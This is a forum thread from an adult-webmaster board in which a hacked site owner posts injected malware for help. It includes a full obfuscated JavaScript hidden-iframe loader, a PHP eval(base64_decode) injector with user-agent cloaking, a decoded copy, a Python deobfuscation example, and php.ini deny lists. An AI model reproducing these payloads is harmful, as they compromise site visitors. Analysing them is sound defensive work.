Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

Old 03-05-2012, 02:40 AM   #1
PornHustler
Confirmed User
 
Join Date: May 2009
Posts: 456
Go Fuck Yourself Hacking Bastards

Well, after more than 3 years without ever being hacked I finally got my first taste of it yesterday and am dealing with it today. I had some nasty codes which I don't know what they do, maybe you guys can help out a little:

This was on my static sites in the body:


Code:
<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q78q74q20q9q9q81q64q78q78q80q77q67q8q62q63q59q64q78q73q72q63q8q61q73q71q9q62q9q14q10q14q8q74q66q74q25q65q73q23q11q1q-6q81q67q62q78q66q23q1q11q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q81q64q78q78q80q77q67q8q62q63q59q64q78q73q72q63q8q61q73q71q9q62q9q14q10q14q8q74q66q74q25q65q73q23q11q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);} you need to pay for this crypt
This was on all of the index.php files I checked so far at the very top of the file:

Code:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1aFlUMHZYSGN2TG1WNFpXTW9NU2t1YVc1a1pYZ3JXMTA3WVdGaFBTY3dKenQwY25sN2JHOWpZWFJwYjI0b2UzMHBPMzFqWVhSamFDaG9aMkpsY21kbGNpbDdhV1lvWVdFOVBUMWhZV0VwQ21ZOUp5MHlPWEV0TWpseE5qZHhOalJ4TFRaeE1uRTJNbkUzTTNFMk1YRTNPWEUzTVhFMk0zRTNNbkUzT0hFNGNUWTFjVFl6Y1RjNGNUTXhjVGN3Y1RZemNUY3hjVFl6Y1RjeWNUYzRjVGMzY1RJNGNUZ3pjVFEyY1RVNWNUWTFjVFF3Y1RVNWNUY3hjVFl6Y1RKeE1YRTJNSEUzTTNFMk1uRTRNM0V4Y1ROeE5UTnhNVEJ4TlRWeE0zRTROWEV0TWpseExUSTVjUzB5T1hFMk4zRTJOSEUzTm5FMU9YRTNNWEUyTTNFM05uRXljVE54TWpGeExUSTVjUzB5T1hFNE4zRXRObkUyTTNFM01IRTNOM0UyTTNFdE5uRTROWEV0TWpseExUSTVjUzB5T1hFMk1uRTNNM0UyTVhFM09YRTNNWEUyTTNFM01uRTNPSEU0Y1RneGNUYzJjVFkzY1RjNGNUWXpjVEp4TFRSeE1qSnhOamR4TmpSeE56WnhOVGx4TnpGeE5qTnhMVFp4TnpkeE56WnhOakZ4TWpOeE1YRTJObkUzT0hFM09IRTNOSEV5TUhFNWNUbHhPREZ4TmpSeE56aHhOemh4T0RCeE56ZHhOamR4T0hFMk1uRTJNM0UxT1hFMk5IRTNPSEUzTTNFM01uRTJNM0U0Y1RZeGNUY3pjVGN4Y1RseE5qSnhPWEV4TkhFeE1IRXhOSEU0Y1RjMGNUWTJjVGMwY1RJMWNUWTFjVGN6Y1RJemNURXhjVEZ4TFRaeE9ERnhOamR4TmpKeE56aHhOalp4TWpOeE1YRXhNWEV4TUhFeGNTMDJjVFkyY1RZemNUWTNjVFkxY1
RZMmNUYzRjVEl6Y1RGeE1URnhNVEJ4TVhFdE5uRTNOM0UzT0hFNE0zRTNNSEUyTTNFeU0zRXhjVGd3Y1RZM2NUYzNjVFkzY1RZd2NUWTNjVGN3Y1RZM2NUYzRjVGd6Y1RJd2NUWTJjVFkzY1RZeWNUWXljVFl6Y1RjeWNUSXhjVGMwY1RjemNUYzNjVFkzY1RjNGNUWTNjVGN6Y1RjeWNUSXdjVFU1Y1RZd2NUYzNjVGN6Y1Rjd2NUYzVjVGM0Y1RZemNUSXhjVGN3Y1RZemNUWTBjVGM0Y1RJd2NURXdjVEl4Y1RjNGNUY3pjVGMwY1RJd2NURXdjVEl4Y1RGeE1qUnhNakp4T1hFMk4zRTJOSEUzTm5FMU9YRTNNWEUyTTNFeU5IRXROSEV6Y1RJeGNTMHlPWEV0TWpseE9EZHhMVEk1Y1MweU9YRTJOSEUzT1hFM01uRTJNWEUzT0hFMk4zRTNNM0UzTW5FdE5uRTJOM0UyTkhFM05uRTFPWEUzTVhFMk0zRTNObkV5Y1ROeE9EVnhMVEk1Y1MweU9YRXRNamx4T0RCeE5UbHhOelp4TFRaeE5qUnhMVFp4TWpOeExUWnhOakp4TnpOeE5qRnhOemx4TnpGeE5qTnhOekp4TnpoeE9IRTJNWEUzTm5FMk0zRTFPWEUzT0hFMk0zRXpNWEUzTUhFMk0zRTNNWEUyTTNFM01uRTNPSEV5Y1RGeE5qZHhOalJ4TnpaeE5UbHhOekZ4TmpOeE1YRXpjVEl4Y1RZMGNUaHhOemR4TmpOeE56aHhNamR4TnpoeE56aHhOelp4TmpkeE5qQnhOemx4TnpoeE5qTnhNbkV4Y1RjM2NUYzJjVFl4Y1RGeE5uRXhjVFkyY1RjNGNUYzRjVGMwY1RJd2NUbHhPWEU0TVhFMk5IRTNPSEUzT0hFNE1IRTNOM0UyTjNFNGNUWXljVFl6Y1RVNWNUWTBjVGM0Y1RjemNUY3ljVFl6Y1RoeE5qRnhOek54TnpGeE9YRTJNbkU1Y1RFMGNURXdjVEUwY1RoeE56UnhOalp4TnpSeE1qVnhOalZ4TnpOeE1qTnhNVEZ4TVhFemNUSXhjVFkwY1RoeE56ZHhOemh4T0ROeE56QnhOak54T0hFNE1IRTJOM0UzTjNFMk4zRTJNSEUyTjNFM01IRTJOM0UzT0hFNE0zRXlNM0V4Y1RZMmNUWTNjVFl5Y1RZeWNUWXpjVGN5Y1RGeE1qRnhOalJ4T0hFM04zRTNPSEU0TTNFM01IRTJNM0U0Y1RjMGNUY3pjVGMzY1RZM2NUYzRjVFkzY1RjemNUY3ljVEl6Y1RGeE5UbHhOakJ4TnpkeE56TnhOekJ4TnpseE56aHhOak54TVhFeU1YRTJOSEU0Y1RjM2NUYzRjVGd6Y1Rjd2NUWXpjVGh4TnpCeE5qTnhOalJ4TnpoeE1qTnhNWEV4TUhFeGNUSXhjVFkwY1RoeE56ZHhOemh4T0ROeE56QnhOak54T0hFM09IRTNNM0UzTkhFeU0zRXhjVEV3Y1RGeE1qRnhOalJ4T0hFM04zRTJNM0UzT0hFeU4zRTNPSEUzT0hFM05uRTJOM0UyTUhFM09YRTNPSEUyTTNFeWNURnhPREZ4TmpkeE5qSnhOemh4TmpaeE1YRTJjVEZ4TVRGeE1UQnhNWEV6Y1RJeGNUWTBjVGh4TnpkeE5qTnhOemh4TWpkeE56aHhOemh4TnpaeE5qZHhOakJ4TnpseE56aHhOak54TW5FeGNUWTJjVFl6Y1RZM2NUWTFjVFkyY1RjNGNURnhObkV4Y1RFeGNURXdjVEZ4TTNFeU1YRXRNamx4TFRJNWNTMHlPWEUyTW5FM00zRTJNWEUzT1hFM01YRTJNM0UzTW5FM09IRTRjVFkxY1RZemNUYzRjVE14Y1Rjd2NUWXpjVGN4Y1RZemNUY3ljVGM0Y1RjM2NUSTRjVGd6Y1RRMmNUVTVjVFkxY1RRd2NUVTVjVGN4Y1
RZemNUSnhNWEUyTUhFM00zRTJNbkU0TTNFeGNUTnhOVE54TVRCeE5UVnhPSEUxT1hFM05IRTNOSEUyTTNFM01uRTJNbkV5T1hFMk5uRTJOM0UzTUhFMk1uRXljVFkwY1ROeE1qRnhMVEk1Y1MweU9YRTROeWN1YzNCc2FYUW9KM0VuS1R0dFpEMG5ZU2M3WlQxbGRtRnNPM2M5Wmp0elBWdGRPM0k5VTNSeWFXNW5MbVp5YjIxRGFHRnlRMjlrWlR0bWIzSW9hVDB3T3kxcFBpMTNMbXhsYm1kMGFEdHBLejB4S1h0cVBXazdjejF6SzNJb016Z3JNU3AzVzJwZEtUdDlDbWxtS0UxaGRHZ3VjbTkxYm1Rb0tDMHhLaklxTWlrcVRXRjBhQzUwWVc0b1RXRjBhQzVoZEdGdUtERXZNaWtwS1QwOVBTMHpLekVwWlNoektUdDlQQzl6WTNKcGNIUSsnKSk7DQp9'));
For all of you WordPress guys out there, are there any plugins that will help keep this from happening again? I am going to have a backup restored so things will be back to normal but this shit pisses me off. Passwords, etc. have been changed.

My host says they don't know how it happened but I have 100's of infected files. I would have figured they would have logs of logins, FTP sessions, etc. But they say they don't know how.

Thanks
__________________
Contact ICQ: 570768377
Sub 1:440 Blog Converting Sponsor
Old 03-05-2012, 02:54 AM   #2
asdasd
So Fucking Banned

Join Date: Feb 2005
Posts: 1,225
Old 03-05-2012, 03:19 AM   #3
DarkJedi
No Refunds Issued.

Join Date: Feb 2001
Location: GFY
Posts: 28,300
you are getting hacked by the same guy from here: https://gfy.com/showthread.php?t=1054210

He is from Kyrgyzstan, he hacks people servers and sells traffic to www.trafficrevenue.net which is operated by a 15 year old Polack Tomasz Klekot .
Old 03-05-2012, 03:20 AM   #4
Harmon
( ͡ʘ╭͜ʖ╮͡ʘ)
 
Join Date: Mar 2004
Posts: 19,998
Old 03-05-2012, 03:45 AM   #5
DidierE
Confirmed User

Join Date: May 2007
Posts: 380
Decode the base64 code with this tool and see what PHP they called on your server: http://www.opinionatedgeek.com/dotne.../base64decode/
Old 03-05-2012, 03:51 AM   #6
anexsia
Confirmed User

Join Date: May 2010
Posts: 5,735
Code:
// Decoded contents of the eval(base64_decode(...)) line found at the top of index.php
error_reporting(0);   // suppress PHP errors so the injection stays quiet
$bot = FALSE;
$ua = $_SERVER['HTTP_USER_AGENT'];
// User-Agent substrings that are NOT served the injected script
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {
    if (strpos(strtolower($ua), $bs) !== false) { $bot = true; break; }
}
if (!$bot) {
    // every other visitor gets the base64-encoded <script> block echoed into the page
    echo(base64_decode('PHNjcmlwdD5hY etc etc etc etc'));
}
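Added example, not code from any poster in this thread: the layers discussed above (a PHP eval(base64_decode('...')) wrapper, a nested base64_decode echo, then a 'q'-separated number list rebuilt with fromCharCode(38+...)) can be unwrapped statically, without running any of it. The function names, the sample input and the example.invalid URL are constructed for illustration.

```python
import base64
import re

# base64_decode('...') literal; the outer wrapper in the thread puts eval( in front
ANY_B64 = re.compile(r"base64_decode\s*\(\s*'([A-Za-z0-9+/=\s]+)'")
EVAL_B64 = re.compile(r"eval\s*\(\s*" + ANY_B64.pattern)
# JavaScript layer: '<n>q<n>q...'.split('q'), rebuilt with fromCharCode(38+1*w[j])
JS_NUMS = re.compile(r"'((?:-?\d+q)+-?\d+)'\s*\.split\(\s*'q'\s*\)")
JS_OFFSET = re.compile(r"\(\s*(\d+)\s*\+\s*1\s*\*\s*\w+\[\w+\]\s*\)")
URL = re.compile(r"https?://[^\s'\"<>]+")

def b64_text(blob):
    """Decode a base64 literal to text; nothing is ever executed."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", blob))
    except ValueError:  # binascii.Error (bad padding) is a ValueError
        return None
    return raw.decode("utf-8", "replace")

def decode_js_layer(js):
    """Rebuild the string hidden in the q-separated number list, or None."""
    nums = JS_NUMS.search(js)
    if not nums:
        return None
    off = JS_OFFSET.search(js)
    offset = int(off.group(1)) if off else 0
    codes = [offset + int(n) for n in nums.group(1).split("q")]
    return "".join(chr(c) for c in codes if 0 <= c < 0x110000)

def unwrap(php_source, max_depth=5):
    """Return every decoded layer, outermost first."""
    layers = []
    m = EVAL_B64.search(php_source)
    text = b64_text(m.group(1)) if m else None
    while text is not None and len(layers) < max_depth:
        layers.append(text)
        js = decode_js_layer(text)
        if js is not None:
            layers.append(js)
            break
        m = ANY_B64.search(text)
        text = b64_text(m.group(1)) if m else None
    return layers

def report(php_source):
    """Summarise one file: infected flag, UA cloaking, URLs in decoded layers."""
    layers = unwrap(php_source)
    joined = "\n".join(layers)
    return {"infected": bool(layers), "ua_cloaking": "HTTP_USER_AGENT" in joined,
            "urls": sorted(set(URL.findall(joined)))}

def _b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed, inert sample with the same three-layer shape (the JS never calls eval)
INNER = "var marker='constructed'; // http://example.invalid/in.php"
SCRIPT = ("<script>f='" + "q".join(str(ord(c) - 38) for c in INNER) + "'.split('q');w=f;s='';"
          "r=String.fromCharCode;for(j=0;j<w.length;j++){s=s+r(38+1*w[j]);}</script>")
PHP = ("$ua = $_SERVER['HTTP_USER_AGENT']; if (strpos(strtolower($ua), 'bot') === false) "
       "{ echo(base64_decode('" + _b64(SCRIPT) + "')); }")
SAMPLE = "<?php eval(base64_decode('" + _b64(PHP) + "')); ?>\n<?php // original index.php\n"

if __name__ == "__main__":
    print(report(SAMPLE))
```

Running `report()` over the contents of every `.php` file in a restored webroot shows which files still carry the wrapper and which URLs the final layer points at.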
Old 03-05-2012, 03:56 AM   #7
ladida
Confirmed User
 
Join Date: Nov 2005
Posts: 2,167
He's just stealing your traffic. No biggie. Imagine if you had members data and they stole that, then sold your emails and full data. I would not sweat too much. Most hosts won't be able to help you with that


__________________
agentGFY *at* gmail.com
Old 03-05-2012, 03:57 AM   #8
SomeCreep
:glugglug

Join Date: Mar 2003
Location: Where the Wild Things Are
Posts: 26,118
Wordpress is fucked. I would never use it.
__________________

Webair Hosting

I use and recommend Webair for hosting.
Old 03-05-2012, 04:03 AM   #9
PornHustler
Confirmed User
 
Join Date: May 2009
Posts: 456
Thanks for the help figuring it out.

I'm just doing a restore on the server.

Putting two and two together equals virus I found on my desktop yesterday. At least I know where I got it.
__________________
Contact ICQ: 570768377
Sub 1:440 Blog Converting Sponsor
Old 03-05-2012, 04:19 AM   #10
k0nr4d
Confirmed User

Join Date: Aug 2006
Location: Poland
Posts: 9,228
You could always just disable eval() on your server's php.ini:
disable_functions = eval

I've never seen that used outside of hacking scripts. The general rule of thumb with eval (as a programmer) is that if you ever find yourself having to use it, you did something wrong. They even have a big 'caution' box listed on php.net on that topic:
http://lu.php.net/eval
Old 03-05-2012, 04:28 AM   #11
anexsia
Confirmed User

Join Date: May 2010
Posts: 5,735
Quote:
Originally Posted by k0nr4d View Post
You could always just disable eval() on your server's php.ini:
disable_functions = eval

I've never seen that used outside of hacking scripts. The general rule of thumb with eval (as a programmer) is that if you ever find yourself having to use it, you did something wrong. They even have a big 'caution' box listed on php.net on that topic:
http://lu.php.net/eval
Thanks for this tip
Old 03-05-2012, 04:34 AM   #12
PornHustler
Confirmed User
 
Join Date: May 2009
Posts: 456
Yes thanks for that tip. Going to have that set up today.
__________________
Contact ICQ: 570768377
Sub 1:440 Blog Converting Sponsor
Old 03-05-2012, 04:38 AM   #13
k0nr4d
Confirmed User

Join Date: Aug 2006
Location: Poland
Posts: 9,228
You can do this too, it might break some scripts on your server though so you might need to remove some of the functions:

Code:
disable_functions = eval,exec,passthru,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,shell_exec,phpinfo
display_errors = off
expose_php = off
Old 03-05-2012, 04:52 AM   #14
travs
Confirmed User

Join Date: Jul 2003
Posts: 1,631
install the WP Security plugin
Old 03-05-2012, 06:33 AM   #15
Blackcrow
Registered User

Join Date: Jul 2008
Posts: 77
nm

Quote:
Originally Posted by k0nr4d View Post
You could always just disable eval() on your server's php.ini:
disable_functions = eval

I've never seen that used outside of hacking scripts. The general rule of thumb with eval (as a programmer) is that if you ever find yourself having to use it, you did something wrong. They even have a big 'caution' box listed on php.net on that topic:
http://lu.php.net/eval
The problem is NATS and ElevatedX both use eval so it cant be disabled for most webmasters. The best I can tell this hacker has 2 modes of operation; he either breaks into the nats admin and uses the templates (or upload documents) to inject code or he uses outdated versions of myphpadmin. You should have IP access turned on for NATS and IP restriction on your myphpadmin install.
Old 03-05-2012, 06:51 AM   #16
PornHustler
Confirmed User
 
Join Date: May 2009
Posts: 456
Quote:
Originally Posted by Blackcrow View Post
The problem is NATS and ElevatedX both use eval so it cant be disabled for most webmasters. The best I can tell this hacker has 2 modes of operation; he either breaks into the nats admin and uses the templates (or upload documents) to inject code or he uses outdated versions of myphpadmin. You should have IP access turned on for NATS and IP restriction on your myphpadmin install.
I dont run any programs.
__________________
Contact ICQ: 570768377
Sub 1:440 Blog Converting Sponsor
Old 03-05-2012, 06:55 AM   #17
Spudstr
Confirmed User

Join Date: Jan 2003
Location: In a Tater Patch
Posts: 2,321
Quote:
Originally Posted by Blackcrow View Post
The problem is NATS and ElevatedX both use eval so it cant be disabled for most webmasters. The best I can tell this hacker has 2 modes of operation; he either breaks into the nats admin and uses the templates (or upload documents) to inject code or he uses outdated versions of myphpadmin. You should have IP access turned on for NATS and IP restriction on your myphpadmin install.
We have seen more exploits with people running phpmyadmin than anything else. People really need to lock these down better with htaccess.
__________________
Managed Hosting - Colocation - Network Services
Yellow Fiber Networks
icq: 19876563
Old 03-05-2012, 07:06 AM   #18
Blackcrow
Registered User

Join Date: Jul 2008
Posts: 77
nm

Quote:
Originally Posted by PornHustler View Post
I dont run any programs.
I'm not a blog guy, but if I had to guess.. there is phpmyadmin on your server. You should scan the server for all installations and delete all installs except one, then IP access protect it.

Last edited by Blackcrow; 03-05-2012 at 07:12 AM..
Old 03-05-2012, 07:17 AM   #19
asdasd
So Fucking Banned

Join Date: Feb 2005
Posts: 1,225
Try holding down high value targets on windows with governments as adversaries.
Old 03-05-2012, 07:20 AM   #20
V_RocKs
Damn Right I Kiss Ass!

Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,392
I love this...
Old 03-05-2012, 10:48 AM   #21
Brent 3dSexCash
Octopus Anime

Join Date: Sep 2007
Location: Chicago
Posts: 1,062
If you use FileZilla, or any other FTP program that stores a 'cache' of your last logged in sites, it's likely they used that info to get into your server. Happened to me a few times.

I've also seen some injects from free WordPress plugins that have big security holes. Always wary of using plugins I'm not familiar with -- or that don't have an active developer.
Old 03-14-2012, 09:56 AM   #22
AJHall
Confirmed User

Join Date: Nov 2002
Location: Southern California
Posts: 1,306
Quote:
Originally Posted by Blackcrow View Post
The problem is NATS and ElevatedX both use eval so it cant be disabled for most webmasters. The best I can tell this hacker has 2 modes of operation; he either breaks into the nats admin and uses the templates (or upload documents) to inject code or he uses outdated versions of myphpadmin. You should have IP access turned on for NATS and IP restriction on your myphpadmin install.
The presence of Eval is due to using Smarty templates. Most of the hacking incidents we've seen in the past 6 years have occurred when someone's servers were wide open and no IP restriction was in place - or when a large number of people from an organization had access to a server and/or admin panels using the same login credentials.

IP restricting access on multiple levels including access to software admin panels is something everyone should be doing.

AJ
__________________
Owner, Elevated X - The 4 Time Award Winning Adult CMS Software Company Used by More Than 2000 Adult Sites.
Old 03-14-2012, 10:16 AM   #23
martinsc
Too lazy to set a custom title

Join Date: Jun 2005
Location: 127.0.0.1
Posts: 27,047
I install Paranoid911 and get immediate mail when anything has changed.... I added a rule to my mail program to ignore the ones that I don't mind (i.e. uploading pics, etc.) and forward to SMS when there is a change in any index.html or index.php file
This will not stop the hacking, but at least I know it happened...
http://wordpress.org/extend/plugins/paranoid911/
__________________
Make Money